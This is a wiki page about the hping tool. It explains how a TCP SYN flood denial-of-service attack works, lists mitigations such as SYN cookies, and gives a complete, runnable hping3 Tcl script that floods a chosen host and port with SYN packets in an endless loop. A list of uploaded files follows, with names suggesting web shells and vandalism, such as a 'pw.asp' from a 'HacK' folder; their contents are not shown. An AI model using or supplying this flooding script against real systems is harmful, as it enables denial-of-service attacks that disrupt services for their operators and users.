hping wiki



!!The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).

The goal of this attack is to send TCP connection requests faster than a machine can process them in order to saturate the resources and prevent the machine from accepting any more connections. Actually the attacker does not create a whole TCP connection, but just send a SYN packet (the first packet required to start a TCP connetion), spoofing at random the source IP address, so from the attacker point of view the resource to perform the attack is only the bandwidth because there is no state to take. Modern operating systems are able to handle resources better than in the past, or to use cryptographic techniques (like Syn cookies or RST cookies) to mitigate the problem (and allocate memory only after the third packet of a new TCP connection reached the host), but still the attack can create some problem. A simpler way to face it, that is somewhat effective and yet very simple, is to drop a connection at random if there are too many open connections.



This wiki is nothing without code, so here we go (as .htcl file).....
# (c) GPL2 fluxist(at)gmail.com
# Usage; hping3 exec ./synflood.htcl <hostname> <dstport>

if {$argc < 2} {
  puts "Required arguments: hostname dstport"
  exit 1
  }

foreach {hostname port} $argv break
set srcport 14000
set target [hping resolve $hostname]
set myaddr [hping outifa $target]

puts "Synflooding $target..."

while {1} {
  hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
  }

 
Attached files
D:\Poze\giorgi.jpg30574 bytesTue Jan 26 13:16:54 GMT 2010remove file
C:\HeRa.cpp.secext946 bytesTue Jan 26 13:16:52 GMT 2010remove file
bernd999.cgi.html153237 bytesTue Jan 26 13:16:47 GMT 2010remove file
C:\Documents and Settings\chris\Bureau\ipscan.exe111104 bytesTue Jan 26 13:16:52 GMT 2010remove file
E:\Poze\imagini\giorgi\Picture 8.jpg73864 bytesTue Jan 26 13:16:56 GMT 2010remove file
ADOLF.jpg30982 bytesTue Jan 26 13:16:57 GMT 2010remove file
F:\HacK\SpecialDav\SpecialDav\SpecialDav\pw.asp.htm.secext83033 bytesTue Jan 26 13:16:46 GMT 2010remove file
SYN flood0 bytesTue Jan 26 13:16:57 GMT 2010remove file
index.html4127 bytesMon Apr 23 11:54:18 GMT 2012remove file
bernd99.php.secext153223 bytesTue Jan 26 13:16:49 GMT 2010remove file
bernd99.cgi.html153223 bytesTue Jan 26 13:16:53 GMT 2010remove file
Edit this page Upload file Page history - Page last update: Thu Jan 12 07:33:52 GMT 2006 by 80.53.188.50 | Your address: 54.227.141.230 | Admin